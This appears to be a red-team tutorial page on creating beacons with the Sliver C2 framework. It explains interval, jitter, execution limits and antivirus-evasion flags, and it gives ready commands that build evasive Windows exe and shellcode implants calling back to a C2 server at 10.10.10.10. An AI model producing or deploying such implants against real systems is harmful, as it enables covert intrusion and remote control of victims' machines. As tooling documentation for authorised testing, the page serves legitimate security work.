🥓 Beacons

Beacons are essential components in a Command and Control (C2) framework, serving as the means through which implants (compromised endpoints) communicate with the C2 server. Beacons send periodic "check-ins" to the C2 server, reporting their status and waiting for further instructions.

🔧 Setting Up Beacons

To generate a beacon in Sliver, you use the generate beacon command. This command allows you to create a binary that can be deployed on target machines to establish a communication channel with the C2 server through listeners.

Basic Beacon Generation (HTTP) :

bash

generate beacon --name my_beacon --arch amd64 --os windows --format exe --http http://10.10.10.10:9000

This basic command sets up a beacon with the following parameters :

--name: Specifies the name of the agent.
--arch: Specifies the CPU architecture.
--os: Specifies the operating system.
--format: Specifies the output format.
--http: Sets the HTTP connection string for communication.

✏️ Key Configuration Options

1. Beacon Interval and Jitter :

Beacon Interval (--days, --hours, --minutes, --seconds) : Configures how frequently the beacon checks in with the C2 server. Adjusting these intervals helps evade detection by security tools.

Jitter (--jitter) : Adds randomness to the beacon interval to avoid creating predictable patterns that could be detected by security monitoring.

2. Evasion Techniques :

Evasion Features (--evasion) : Enables various evasion techniques to bypass security measures such as antivirus solutions.

Disable Shikata Ga Nai (--disable-sgn) : Disables the Shikata Ga Nai shellcode encoder, which might be flagged by some security solutions.

3. Limitations and Constraints :

Hostname (--limit-hostname) : Only execute on a specific hostname.

Username (--limit-username) : Only execute if a specific user is logged in.

File Existence (--limit-fileexists) : Only execute if a certain file exists on the filesystem.

Domain Joined (--limit-domainjoined) : Only execute if the machine is domain-joined.

Datetime (--limit-datetime) : Restrict execution to before a specific date and time.

4. Error Handling and Reconnect :

Max Errors (--max-errors) : Defines the maximum number of connection errors before the beacon gives up.

Reconnect (--reconnect) : Sets the interval at which the beacon attempts to reconnect to the C2 server if the connection is lost.

🪚 Examples

HTTP / Evasion

bash

generate beacon --name my_beacon --arch amd64 --os windows --format exe --http http://10.10.10.10:9000 --evasion --save beacon_https.exe

Shellcode / HTTPS / Evasion

bash

generate beacon -b https://10.10.10.10:9000 --evasion --format shellcode --name beacon_https --save beacon_https.bin

🥓 Beacons ​

🔧 Setting Up Beacons ​

✏️ Key Configuration Options ​

1. Beacon Interval and Jitter : ​

2. Evasion Techniques : ​

3. Limitations and Constraints : ​

4. Error Handling and Reconnect : ​

🪚 Examples ​

HTTP / Evasion ​

Shellcode / HTTPS / Evasion ​

🥓 Beacons

🔧 Setting Up Beacons

✏️ Key Configuration Options

1. Beacon Interval and Jitter :

2. Evasion Techniques :

3. Limitations and Constraints :

4. Error Handling and Reconnect :

🪚 Examples

HTTP / Evasion

Shellcode / HTTPS / Evasion